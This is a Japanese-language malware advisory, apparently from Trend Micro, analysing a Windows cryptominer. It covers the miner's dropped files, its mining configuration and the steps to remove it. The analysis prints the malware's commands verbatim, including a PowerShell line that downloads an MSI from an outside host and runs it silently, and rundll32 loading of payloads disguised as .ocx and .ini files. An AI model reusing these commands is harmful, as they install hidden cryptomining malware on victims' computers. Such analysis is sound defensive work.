COINMINER.WIN32.MALXMR.TIAOODAM
Windows
- マルウェアタイプ: 仮想通貨発掘ツール(コインマイナー)
- 破壊活動の有無: なし
- 暗号化: はい
- 感染報告の有無: はい
概要
トレンドマイクロは、このマルウェアをNoteworthy(要注意)に分類しました。
マルウェアは、自身の活動に複数の難読化を取り入れ検出回避機能を発達させたコインマイナーです。
コインマイナーは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
詳細
侵入方法
コインマイナーは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
コインマイナーは、以下のファイルを作成します。
- %User Temp%\{8 Random Characters}.msi → Downloaded file
- %User Temp%\[{6 Random Characters}] → Coinminer configuration
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\data.bin
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\dafault.ocx
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\ex.exe → normal file a unzipping tool
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\f.bat → Detected as Trojan.BAT.TASKILL.AA
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\icon.ico → Detected as ADW_FileTour
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\FRERES32.ini
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\SpyGlass.ini
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\_setup.ini
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\bin.dat
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\plugin.cx
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\f.bat → Detected as Trojan.BAT.TASKILL.AA
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\ex.exe → normal file a unzipping tool
- %User Temp%\{6 Random Characters}.cmD
(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000、XP、Server 2003の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000、XP、Server 2003の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。)
コインマイナーは、以下のフォルダを作成します。
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\ → Create in first run
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\ → Create when the coinminer process has been terminated
(註:%Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000、XP、Server 2003の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。)
ダウンロード活動
コインマイナーは、以下のWebサイトにアクセスし、不正なファイルをダウンロードして実行します。
- https://{BLOCKED}in1709.info/update.txt
<補足>
インストール
コインマイナーは、以下のファイルを作成します。
- %User Temp%\{ランダムな8文字}.msi →ダウンロードされたファイル
- %User Temp%\[{ランダムな6文字}] →コインマイナーの設定ファイル
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6桁のシステム時刻}\data.bin
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6桁のシステム時刻}\dafault.ocx
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6桁のシステム時刻}\ex.exe →通常のファイル解凍ツール
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6桁のシステム時刻}\f.bat →Trojan.BAT.TASKILL.AAとして検出されるファイル
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6桁のシステム時刻}\icon.ico → Detected as ADW_FileTour
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\FRERES32.ini
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\SpyGlass.ini
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\_setup.ini
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\bin.dat
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\plugin.cx
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\f.bat →Trojan.BAT.TASKILL.AAとして検出されるファイル
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\ex.exe → 通常のファイル解凍ツール
- %User Temp%\{ランダムな6文字}.cmD
コインマイナーは、以下のフォルダを作成します。
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6桁のシステム時刻}\ →初回実行時に作成される
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\ →コインマイナーのプロセスが終了した時に作成される
その他
コインマイナーは以下を実行します。
- 自身のマイニング活動に以下の詳細が使用される
- アルゴリズム: cryptonight
- ユーザ名: {BLOCKED}1xWHG1vywX2xTV8XZzbzB1E2QHEF9GtzPhSPRdK5TEkxXGRxVdAq8LwbA2Pz7jNQ9gYBxeFPHcqiiqaGJM2QyW64C
- パスワード: soft-net
- URL: {BLOCKED}.{BLOCKED}.{BLOCKED}4.170:2223
- 初回実行時に以下のプロセスを作成する
- f.batの実行(システムにAVAST あるいはAVGがインストールされていた場合は、コインマイナーのインストーラプロセスを強制終了する)
- cmd /c ""%Application Data%\Microsoft\Windows\Templates\\FileZilla Server\{6桁のシステム時刻}\f.bat" "
- icon.icoを解凍 (パスワード: icon)
- cmd" /c "cd "%Application Data%\Microsoft\Windows\Templates\\FileZilla Server\"&ex -o -P icon icon.ico"
- サブフォルダを作成し、全ての作成したファイルを移動してから、rundll32.exeを使用してdefault.ocxから関数Entryを読み込む
- "cmd" /v:on /c "set iao=rundll32&set poq=%time:~6,2%%time:~0,2%%time:~3,2%&mKdir "%Application Data%\Microsoft\Windows\Templates\\FileZilla Server\!poq!"&cd "%Application Data%\Microsoft\Windows\Templates\\FileZilla Server\!poq!\"&move /y "%Application Data%\Microsoft\Windows\Templates\\FileZilla Server\*.*" "%Application Data%\Microsoft\Windows\Templates\\FileZilla Server\!poq!"\&!iao! default.ocx,Entry u"
- msiexecを強制終了する
- "%System%\taskkill.exe" /IM msiexec.exe /F
コインマイナーのプロセスを終了した後、以下のプロセスを作成する
- msiインストーラを%User Temp%にダウンロード
- "%System%\WindowsPowerShell\v1.0\powershell.exe" -command "$cli = new-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'Windows Installer';$f = ' %User Temp%\\{ランダムな8文字}.msi'; $cli.DownloadFile('https://{BLOCKED}in1709.info/update.txt', $f);Start-Process $f -ArgumentList '/q'"
- ダウンロードしたファイルを実行
- "%System%\msiexec.exe" /i "%User Temp%\{ランダムな8文字}.msi" /q
- f.batを実行(システムにAVASTまたはAVGがインストールされていた場合、コインマイナーのインストーラプロセスを強制終了)
- cmd /c ""%Application Data%\Microsoft\Windows\Templates\\Response Center\{6桁のシステム時刻}\f.bat" "
- plugin.cxを解凍 (パスワード: ZvDggW):
- "cmd" /c "cd "%Application Data%\Microsoft\Windows\Templates\\Response Center\"&ex -o -P ZvDggW plugin.cx"
- サブフォルダを作成し、作成したファイル全てを移動してから、rundll32.exeを使用して_setup.iniから関数Entryを読み込む
- "cmd" /v:on /c "set iao=rundll32&set poq=%time:~6,2%%time:~0,2%%time:~3,2%&mKdir "%Application Data%\Microsoft\Windows\Templates\\Response Center\!poq!"&cd "%Application Data%\Microsoft\Windows\Templates\\Response Center\!poq!\"&move /y "%Application Data%\Microsoft\Windows\Templates\\Response Center\*.*" "%Application Data%\Microsoft\Windows\Templates\\Response Center\!poq!"\&!iao! _setup.ini,Entry u"
- 作成したフォルダ内のすべてのファイルを削除します。
- cmd /c ""%User Temp%\{ランダムな6文字}.cmD" "
- f.batの実行(システムにAVAST あるいはAVGがインストールされていた場合は、コインマイナーのインストーラプロセスを強制終了する)
注意
6桁のシステム時刻の例)071756
07はミリ秒、17は時間、56は分を示す
FRERES32.iniはTotal CommanderからWindows 9x / ME上で無料のシステムリソースを利用するためのライブラリです。
SpyGlass.iniはInqSoft Window Scannerによるソフトウェアのライブラリです。
対応方法
手順 1
Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 2
このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。
手順 3
Windowsをセーフモードで再起動します。
手順 4
以下のファイルを検索し削除します。
- %User Temp%\{8 Random Characters}.msi
- %User Temp%\[{6 Random Characters}]
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\data.bin
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\dafault.ocx
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\ex.exe
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\f.bat
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\icon.ico
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\FRERES32.ini
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\SpyGlass.ini
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\_setup.ini
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\bin.dat
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\plugin.cx
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\f.bat
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\ex.exe
- %User Temp%\{6 Random Characters}.cmD
手順 5
以下のフォルダを検索し削除します。
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}
手順 6
コンピュータを通常モードで再起動し、最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、「COINMINER.WIN32.MALXMR.TIAOODAM」と検出したファイルの検索を実行してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください